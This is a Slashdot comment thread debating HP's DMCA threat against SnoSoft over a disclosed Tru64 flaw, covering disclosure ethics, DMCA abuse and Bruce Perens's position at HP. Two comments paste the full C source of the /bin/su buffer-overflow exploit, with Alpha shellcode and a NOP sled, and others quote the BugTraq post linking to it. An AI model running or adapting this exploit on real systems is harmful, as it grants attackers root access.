HP Uses DMCA To Quash Vulnerability Publication 675
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
Bruce Perens (Score:5, Insightful)
Re:Bruce Perens (Score:5, Informative)
Bruce
Re:Bruce Perens (Score:5, Informative)
Bruce
Thats not a solution (Score:4, Insightful)
It's a waste of time. Even if they back off
Please
Hackers can expose findings and report them to companies
Given the sad fact that all our politicians (not just in america but worldwide are elected by money) maybe the following compromise can be reached:
a) Hackers who find vulnerabilites must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.
b) Companies that take no action (that is dont make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public, are liable for exploits.
c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.
Is there any way for you to use your publicity to bring something like this about?
At least try. I hate the fact that curiousity is now a crime. I am allowed to take apart my car and see how it works
Thanks,
Johan
Well, maybe not the ACLU... (Score:3, Informative)
As a member of the media, and a person that touches base with the ACLU every few weeks, I'll say that the ACLU is no longer interested in civil liberties, but more interested in legislating this society to a direction that they would prefer us to act. Trying to modify behavior through legislation is very different than protecting the right for us to act the way WE WANT TO ACT.
As of late, they seem to be only interested in anyone else but a person interested in computers. After talking with me several times face to face, the local rep of the ACLU has pretty much explained about their crusade against private Christian schools (please not the stressing of private) and their deemed "objectionable behavior" by those schools, and active interest in what goes on inside those schools. Those activities are rather curious for an organization like the ACLU, are they not?
After talkig to them about these subjects, I would never, EVER give them another dollar. They appear to represent the civil liberties of only SOME AMERICANS. OF COURSE, before I get slapped back, I would like to repeat this... imho, IMHO, IMHO!
So as a member in good standing of the
This is a call to not listen to the ACLU. For computer issues, please stick your money to the EFF. The ACLU has gotten batty in its old age, and is trying to change the way we think, which the last time I checked, is a CIVIL LIBERTY.
Re:Bruce Perens (Score:3, Funny)
Re:Bruce Perens (Score:5, Interesting)
Bruce
Re:Bruce Perens (Score:4, Insightful)
To a great extent, this is intentional. One of the real benefits of email and posting replies is that you can stare at your text on the screen, rewrite, check facts, reword, and only hit the Send button when you think you've got it right. Granted, not everyone does this, but many (possibly most) of us do.
Also, a phone call can easily get lost in the shuffle. A text message sits there until someone deletes it. You can come back to it an hour or a year later. You can toss it into bins and count the pro/con messages. You can grep through your messages looking for keywords.
I can't see any reason for techies to ever use the phone for issues like this. Posted and emailed replies are so superior.
Phone calls and face time make sense for communicating with suits. They don't make sense in technical discussions. This is a lot of why Open Source development has been so outpacing corporate software lately. The corporate model has people in a room or on the phone. The Open Source model has everyone communicating via email and mailing lists. The latter is orders of magnitude more effective at getting ideas across without loss or misunderstanding.
This is a marketing disaster for HP. (Score:5, Interesting)
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
Re:This is a marketing disaster for HP. (Score:5, Interesting)
Bruce
Re:This is a marketing disaster for HP. (Score:3, Insightful)
I'm going to wander slightly off topic here but I feel what you are saying is wrong. Today, top company exectutives seem to be above the law. They can operate their companies however they choose. No one ever seems to hold them accountable. A company goes bankrupt, thousands loose their jobs and top executives are laughing all the way to the bank. In this example an executive acts in an irresponsible manner that could affect many of his customers, and you suggest mearly a wrist slap?
Re:Bruce Perens (Score:4, Interesting)
My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.
Thanks
Bruce
I need your call on this, please, folks. (Score:4, Interesting)
In my investigation, I read the Snosoft home page [snosoft.com]. This is the second sentence of their introductory paragraph:
Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?
I would hate to be manipulated in a shakedown of my own company.
On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.
What do you think?
Bruce
Re:I need your call on this, please, folks. (Score:5, Insightful)
I guess I don't understand how full disclosure can equate to a shakedown.
The company (snosoft) seems like a more or less legit research company, and the fact that they have a full disclosure policy in no way says that they are trying to take out companies. It just says, up front, that they have a policy of disclosing these security breaches that they find.
On the other hand they have to make money somehow - so they contract out their services to companies who wish to have their software audited.
I could be wrong, but by looking through their posts on security focus, I don't think they are out to extort money from companies - and this is especially true if they gave HP a year to fix this problem (in fact if that is true then you should REALLY stick it to the top brass).
It could go either way - but it doesn't look like they are in the business of extortion. And the fact that they have been around for a while, and seem to be respected in the security community says quite a lot....
ON THE OTHER HAND.... I don't see how it is in any way shape or form right for HP to sick the DMCA on them, no matter what their business practices are. This is a vulnerability in HPQ's software and should not be treated with such arrogance (don't report it or else!).
Just my $.02
Derek
Re:I need your call on this, please, folks. (Score:5, Interesting)
Bruce
Re:I need your call on this, please, folks. (Score:3, Interesting)
How are contracted researchers expected to behave in such a situation?
It seems that the usual "full disclosure" notice comes from an audit of a product by an external group / individual without contract or invitation by the producer of that product (publicity-grabbing "hacker challenges" aside). Such reports certainly warn the product's user base. But they also seem to be an attempt to embarass the producer of that product to action - patching the current issue and perhapse increasing future quality control.
What if the research group is hired by WidgetSoft to audit the Widget2000 and they discover a major vulnerability? It is unlikely the public will ever hear of it from the research group. WidgetSoft will likely develop the patch, and release it with their own report based on the research group's findings.
But what if WidgetSoft decides to bury the findings? Then our hypothetical research group has a dilema. It would be wise for this group to be sure their business contract specifically avoids conflicting with their morals.
Unless, of course, they're in the business of the shake-down.
Re:I need your call on this, please, folks. (Score:3, Insightful)
Even if it was a company that engaged in outright extortion, ie "we just found this hole, pay us $10,000 by Friday or we release it", some advice my Mother gave me comes to mind.
Two Wrongs Don't Make a Right
HP's Customer's are inocent third parties in this matter. Once the exploit was released, no matter how shady the people who released it were, HP should have been trying to notify it's customers instead of engaging in a futile attempt to put the cat back in the bag. HP has increased the harm to innocent third parties by not contacting them, and now their actions have insured that the code for the exploit is more widely distrubited than before.
SnoSoft's actions may have been wrong, but that did not give HP a license to engage in wrong actions of their own.
Re:Bruce Perens (Score:4, Interesting)
I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.
I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.
As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information, given the nature of many of the parties involved I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly the situation gets complicated, the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light, I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.
However the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on it's head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The chances are good that SnoSoft has discovered a problem that others know about or are explioting can not be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine, I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them then that is what I will do.
Regardless of the events leading to Mr. Ferson's letter to SnoSoft HP must clarify their position on this situation. I would hope that you are willing to state that provided no illegal methods were used to discover the vulnerability HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breech of contract it is a matter for civil courts.
Aaron Schneider
Manager, Information Technology
Fabutan Sun Tan Studios
Schneider@fabutan.com
Re:Bruce Perens (Score:3, Informative)
If you've been around a while, you'll remember that I was once famous for walking off of Open Source projects in a huff because of something I didn't agree with. It didn't always achieve the desired goal.
Bruce
Re:Bruce Perens (Score:4, Interesting)
But don't think that sticking around is the easy path for me - I hate this sort of problem.
Please do Bruce. HP has always seemed to me to be a decent, ethical, techie-friendly company, and the recent commitments to Open Source have only reinforced that. It seems that this particular incident is pretty much entirely the old Compaq mindset and management structure in action. It's going to take time to help people adjust to the new company, and somebody needs to be there to do that helping. Without that help the 'new HP' will almost certainly end up as a mish-mash of the worst bits of the 'old' HP and Compaq - not a pretty sight.
It won't be easy - I think changing attitudes in the ex-Compaq staff will be more difficult than with the 'old HP' staff, but a merger of two such enormous companies was always going to be difficult.
This is maybe another reason that the sooner Tru64 (and HPUX) is pensioned off, the better. If there was a single company-wide OS (guess which? ;) this would never have become an issue. Separate OSes mean separate management teams, which is how (I guess) this flaw managed to go unfixed and unnoticed by higher management for so long, before this all boiled over into DMCA abuse. Not to mention that HP probably wouldn't have had to fix it themselves anyway - the joys of collaborative development.
Perhaps the merger itself had something to do with this? With a bunch of management reorganization and other internal changes, it doesn't seem all that unlikely that approval for a fix for this got waylaid somewhere, and resorting to the DMCA was just a (stupid) way of trying to buy more time whilst people tried to figure out who had the right authority. Then again, I know nothing about the inside of the new HP, so this is all conjecture.
Anyway, good luck getting to the bottom of this, and keep at it - having HP playing nicely with fellow passengers on board the Open Source train is a good thing.
Ironic (Score:5, Insightful)
The chickenshit weasels.
Re:Ironic (Score:2, Funny)
Re:Ironic (Score:5, Informative)
Bruce
*THIS* is the case you want to take to the Court (Score:2, Insightful)
The Supreme Court tends to frown heavily on prior restraint.
Re:DMCA Virus (Score:5, Funny)
"Somebody" writes a virus, let's call it Rhinovirus 31337. The "source code" is copywritten and encrypted in such a way as to be a technological means to protect the information. In this case, the entire workings of the virus are contained in this string:
ATAGGCAGAGATCAGGCTATACGGCGCCTTATCG...
Pharm-O-Leetica "discovers" the "cure" for Rhinovirus 31337 and launches a multi-million dollar ad blitz, softening the market for deep penetration. They buy up a few Congressman along the way.
Meanwhile, back at 2600 Headquarters, Bruce "Emacs" Perens and Leonard "Vi" Felten have teamed up to discover a cure for the 31337 virus. They easiliy de-sequence, or "reverse engineer," the threat. They hire Russian programmer Dmitry "Acrobat" Sklyarov to announce their findings at the World AIDS Conference.
Just before Dmitry takes the stage, the Feds, led by John Ashcroft and Hillary Rosen, storm the Convention and Dmitry is hauled off and thrown in Camp X-ray for overstaying his visa. Hackers find a backup copy of his work and quickly discover that the files are encrypted with the password "voraylkS." It takes another six weeks to decode the archaic Visicalc format.
In the meantime, millions have become infected with 31337. The cure costs about $1000 per month, but rumors begin surfacing that all you need is a glass of warm milk at bedtime and you'll be fine! Brazil announces that they intend to provide free milk to their suffering populous; pharmaceutical companies around the world cry foul. "That's OUR cure!"
A clueless Pharm-O-Leetica VP, dazed from the fast pace of mergers and layoffs, announces "You reverse engineered our virus; only WE are allowed to do that!!!"
(sound of gauntlet falling)
I dare you to come up with a better analogy!
By the way, Neal Stephenson should write a book based on my post, and I'm not just saying that because I'm an egomaniac who is going to accept the +1 Bonus for this diatribe.
Apache (Score:5, Insightful)
Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.
Re:Apache (Score:5, Insightful)
These guys waited a YEAR and HP still hadn't fixed the problem.
Re:The EU (Score:3, Insightful)
Who's laughing at Alan Cox now? (Score:5, Insightful)
Anyone still feel like laughing?
Re:Who's laughing at Alan Cox now? (Score:4, Insightful)
[SNIP of e-mail quote I replied to]
"It's very simple, and something like this is done all the time in the security industry
by people who not only enjoy it, but who get paid to do it.
1) Discover an exploit or a new way of using a known exploit.
2) Write a trojan, virus, worm, etc. that takes advantage of the exploit.
3)* Report the exploit to the applicable compan(y/ies), Security Focus, etc. and provide
the BINARY of your trojan, virus, or whatever so they can test the
exploit and find a fix.
* Usually people provide the source code as open software. In this case (for this
argument) we release it as binary only and keep full rights.
No law was broken when the trojan, virus, etc. was written and no one can (technically)
seek prosecution. Under DMCA (at least the way the writers of it have
used it), anyone attempting to reverse engineer your virus (or whatever) and provide an
antigen, is liable to you and you can sue them.
To take another angle, those of us who actively look for exploits in software (because
companies like M$ fail to do so themselves) risk being sued for doing so.
This makes jobs like mine EXTREMELY difficult because on the one hand I don't want my
company using software that will allow Joe Cracker to take over our
machines, and on the other I don't want the company sued just because I did some
necessary reverse engineering in order to prevent it (again, because the
software mfg. can't be trusted to do it themselves).
PGA
--
Paul G. Allen
UNIX Admin II/Programmer
Akamai Technologies, Inc.
www.akamai.com
Work: xxx-xxx-xxxx
Cell: xxx-xxx-xxxx"
(Note: I no longer work for the above referenced company as my office was closed late last year. My statements and views are mine alone and do not, nor ever have, represented the views of Akamai Technologies, Inc. or any of it's officers and/or representatives.)
So, what do _I_ get for my warnings to the kernel developers? Blackballed from the list by the maintainer, in a rather rude fashion IMO. (despite the fact that I've received many a thank you for the information I had provided)
So, to all those who have read, heard, and seen such warnings, wherever you've read, seen, or heard them, and were asked to take action and do not, I say stop whining, shut up, and suffer. The same thing I tell people who don't vote - if you can't do your part to fight the problem, you have no right to bitch and moan about it.
My solution to many of these issues is not to support the companies promoting them. I no longer buy CDs, DVDs, or go to movies (yes, I will be missing the second in the LotR series - which I have long awaited.) I do not buy Compaq, and will never buy another HP device. I do not buy M$ products or anoything that runs on M$ platforms either. I have written letters to congress critters, etc. as well.
How many others can say they've actually done their part to fight the DMCA, US Patriot Act, CDBTPA, etc. and/or whatever equivalent laws you may have in your own countries?
I for one wish more folks in Alan's position would speak up. I commend him for doing his part, and he's not even a US citizen, is he?
I for one never did laugh at him.
PGA
Re:Who's laughing at Alan Cox now? (Score:3, Insightful)
Thats a shame. There is a lot of great music on independant labels who have a really good attitude to their fans. They don't hide lyric sheets, they often waive some radio fees and in many cases they work through local recording studios and cd firms helping them to survive and support local music.
I don't know about the USA but the UK has many relatively independant and completely independant small labels (eg www.showofhands.co.uk - a band whose musicians who actually go around teaching people to play their music, www.madrarua.com (ok Im biased they are in Swansea)). When I visited St Johns newfoundland I was amazed at the huge mostly independant and deeply vibrant music culture there.
FUCK HP (Score:2, Insightful)
Fuck HP. IT's like Ford trying to get the safety concerns of the Pinto hushed up.
Consumers are in danger, and WE COME FIRST.
Meanwhile..... (Score:5, Funny)
Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...
-Chris
If they sue and lose, it helps. (Score:2)
An Excellent Quote (Score:5, Insightful)
When will people learn this is the same thing?
Re:An Excellent Quote (Score:3, Insightful)
I'm sure the congressmen (they own) will also take a responsible line, and won't conflate these kinds of issues with actual breaches of copyright, terrorism, or other acts most people consider unacceptable.
Re:An Excellent Quote (Score:4, Insightful)
So, to carry the Ford Explorer analogy, they should've stayed quiet until the manufacturer recalled all the tires?
HP had a year to deal with this! WHy don't they hire some programmers, instead of lawyers.
This is rediculous! (Score:2, Insightful)
If I take over somebody's True64 machine via this security hole, I haven't broken copyright at all.
Now, if I take documents off of the server, then I may be breaking copyright, but I don't think the connection is strong enough to stand up in a court of law.
I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright. Does that mean we should ban guns since they are a possible copyright protection circumvention device?
Bruce, it's time for you to make a decision (Score:4, Insightful)
It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.
But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.
It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?
Re:Bruce, it's time for you to make a decision (Score:3, Insightful)
Does this cause Bruce to reconsider his employer? Only Bruce knows. Does this cause us to want him to make a statement by resigning or taking some other action? I suspect so. But I don't want to see the community pushing him toward a decision that isn't in his best interests. I think we just need to sit back and wait, to see what happens next.
Re:Bruce, it's time for you to make a decision (Score:3, Informative)
Bruce
Re:Bruce, it's time for you to make a decision (Score:4, Informative)
Bruce
Re:Bruce, it's time for you to make a decision (Score:5, Insightful)
I just want to say that I an 100% behind your request for time instead of having to answer to a horde of mad slashdot zealots wielding pitchforks when you've had no time to investigate. Not all of us here are so quick to assume the worst.
Good luck in your discussions with the PHB's that be.
Re:Bruce, it's time for you to make a decision (Score:3, Informative)
Bruce
Re:Bruce is 2 faced, so expect him (Score:2, Funny)
Re:Bruce, it's time for you to make a decision (Score:5, Insightful)
You know it is possible -- and ethical! -- to not do something because it goes too far. Or is HP obligated to murder someone if it increases shareholder profit? And before you say, "Well, the law imposes too high a cost", answer me this: What if you could prove the legal sanction was less than the profit realized? Should HP kill the person? Must they?
Re:Bruce, it's time for you to make a decision (Score:5, Interesting)
The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge free of speech or of the press.
"The only law shalt be maximixe your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. The is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.
I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.
Re:Bruce, it's time for you to make a decision (Score:4, Insightful)
Thanks
Bruce
C-Net news better look out! (Score:2, Interesting)
http://deepmagic.securify.org.uk:8080/su.c
Do you mean this source code? (Score:4, Interesting)
#include stdlib.h
#include string.h
#include unistd.h
char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j; char buffer[8239]; char payload[15200];
char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;
buffer[i++] = 0x01; buffer[i++] = 0x04;
buffer[i++] = 0x01; buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
Re:Do you mean this source code? (Score:3, Funny)
Lets try this again... (Score:5, Interesting)
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
From the lawer.. (Score:5, Funny)
HP users herby request that HP remove the buffer overflow exploit from Tru64.
Re:From the lawer.. (Score:3, Insightful)
How long before Security Focus's new owner, Symantec, starts to take threats like this and force Security Focus to comply with demands like this?
I just checked, at least the post in question is still in their mailing list archives...
DMCA and research (Score:4, Insightful)
* Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.
Re:DMCA and research (Score:2)
Re:DMCA and research (Score:5, Insightful)
Uh, no, "invoking the DMCA" is precicely what HP is doing, though they haven't formally filed a complaint with the feds. How can you possibly defend these unscrupulous fucks? From dictionary.com [dictionary.com].
invoke Pronunciation Key(n-vk)
tr.v. invoked, invoking, invokes
2. To appeal to or cite in support or justification.
5. To resort to; use or apply:
Excerpt from the CNet article (Score:3, Interesting)
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
Re:Excerpt from the CNet article (Score:2)
Re:Excerpt from the CNet article (Score:4, Insightful)
Re:Excerpt from the CNet article (Score:4, Interesting)
Re:Excerpt from the CNet article (Score:5, Insightful)
No, of course you wouldn't like it. And, if you were an emperor who got suckered into walking around naked, you'd be fairly pissed at the kid who pointed out that you were, in fact, naked.
But, this story has nothing to do with HP "liking" or "not liking" it when people (rightly) point out that they're walking around naked. The story is about the fact that the DMCA has emboldened HP to the point that they feel it's better to walk around naked and sue anyone who notices, rather than buying some reasonable clothes.
Etiquette in the security community demands that the discovers of holes give companies reasonable time to respond to security problems, before publicizing the security problems. But this courtesy is not, in any way, a courtesy towards the company that manufactures the flawed product. That company's opinion in the matter doesn't mean squat. It is a courtesy extended entirely to the users of the product. Users are harmed if they do not know about exploitable flaws in the products they use, but at the same time users are harmed if the exploitable flaws are widely known before patches are available. The only reasonable role for a company with flawed products in the security process is to work diligently to minimize the harm to users, by the only method available to them -- by expediting patches for their products, and thus providing an environment where the user can be informed of security flaws in their product as quickly as possible.
Unfortunately, what HP has done here is imagine itself to have some other role in the security process -- someone at HP is under the completely mistaken impression that their opinion of the security process matters in any way. It does not. The courtesies of the security process are entirely towards the users of the flawed product. People have a right to know about flawed products. HP has the opportunity to provide patches to their product, so that those users might have some alternative to simply throwing all of their HP equipment in the garbage, but that is entirely HP's opportunity, and really of no concern either to the users or to the security professionals who disclose the hole.
hp wasting valuable engery (Score:4, Insightful)
when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achive the immediate goal of supressing bad stuff (real or imagined).
so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.
eric
p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.
bugtraq email (Score:4, Informative)
got fed up of corporate bullshit
here is the warez, nothing special, but it does the job
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail
Very Frustrating (Score:2, Insightful)
Imagine if you would, a secure piece of software ( or a secure piece of hardware ) is sold to handle monitary transactions, no-one can verify that the software/hardware is infact secure
Yeah for the DMCA for protecting corporations instead of the individual!
my 2 cents.
Dear HP (Score:2)
Sincerely,
A Former Customer.
Wonder if anyone could countersue? (Score:2)
It's too bad that people have egos, also, because if things like hard crypto implementations, security information, and so on were simply released anonymously into various outlets (e.g., not just the net), there would be nobody to sue.
In this case I think there won't be anybody to sue either -- the individual who made the report might not be subject to US law.
Take this to its logical conclusion, and realize that computer systems in the USA will tend to be less secure than their counterparts in free countries that do not suppress information exchange. I wish it were simpler to relocate to Europe; it sure as hell appears to be easy for them to relocate to the USA.
In other news (Score:4, Funny)
Security through [mrf! Grbbl--!] (Score:3, Insightful)
- Securith through Obscurity
and- Security through Diligence
we now add the mighty- Security through Litigation?
To be fair, when do the handgun designers go to jail again?Re:Security through [mrf! Grbbl--!] (Score:2)
Its much worse than that. Its like Ford suing the mechanices for fixing the defective bumper on your Pinto that makes it blow up.
HP is the King and you shalt not degrade His reputation.
DMCA Violation? (Score:3, Insightful)
How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?
Re:DMCA Violation? (Score:4, Insightful)
Re:DMCA Violation? (Score:4, Interesting)
It is one thing for a MegaCorp to slam down a few million on litigation, it's another for me to pay to fight it. Am I really willing to go to the poor house over this issue? Am I really willing to throw away a fair job, an OK home, and my car?
The problem in the US is that justice is bought and paid for. If you don't have the cash, you are part of the trash. Trash gets swept up. No, the only real effective course of action is to start bitching to office seekers and to stop paying for Intellectual Property. Swap CD's, swap DVD's, for God's sake read a book from the library. But don't shell out bucks for IP anymore. The profit they make is part of the club they are using against us.
If no one purchased what Sony is selling, how long do you think Sony would stay in business? If we boycott RIAA members, how long would it be until Ms. Rosen had to go earn an honest living?
Look, it's not a problem if you fall off the wagon. Just take the amount of money you spent on that CD, movie or DVD and send a like amount to the EFF.
OK, so I'm a broken record.
Re: (Score:2, Interesting)
Ridiculous (Score:5, Insightful)
HP trying to cover this up just proves its a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS'.
People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their carreers. Data important to one's carreer (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.
We have the right to know exactly what problems their are in our software.
Be thankful... (Score:2, Funny)
Don't ask, don't tell.
as a Tru64 admin... (Score:4, Interesting)
Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.
Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).
It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
Tell HP's CEO what you think! (Score:5, Informative)
Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
Re:Tell HP's CEO what you think! (Score:4, Funny)
I just read about your company's threat of action under the DMCA against a security researcher who released exploit information about your Tru64 Unix product. As a software engineer working for a large competitor of yours, I'd like to thank you for your actions. The well-earned reputation for security and reliability of our product can only be enhanced by ill-mannered attempts at suppressing information from your company. Any further help you can provide in assuring my future job security in this uncertain economy will be greatly appreciated.
My mail to Carly (Score:4, Interesting)
I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.
Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.
Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.
This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.
I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to reccomend that anyone give their money to Hewlett Packard.
Looking forward to your response.
[Name Removed]
Re:My mail to Carly (Score:4, Insightful)
Talk about the pot calling the kettle black...
So This is the, "New HP?" (Score:4, Interesting)
HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."
As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.
Schwab
Babelfish Translation (Score:5, Funny)
Dear HPaq customers,
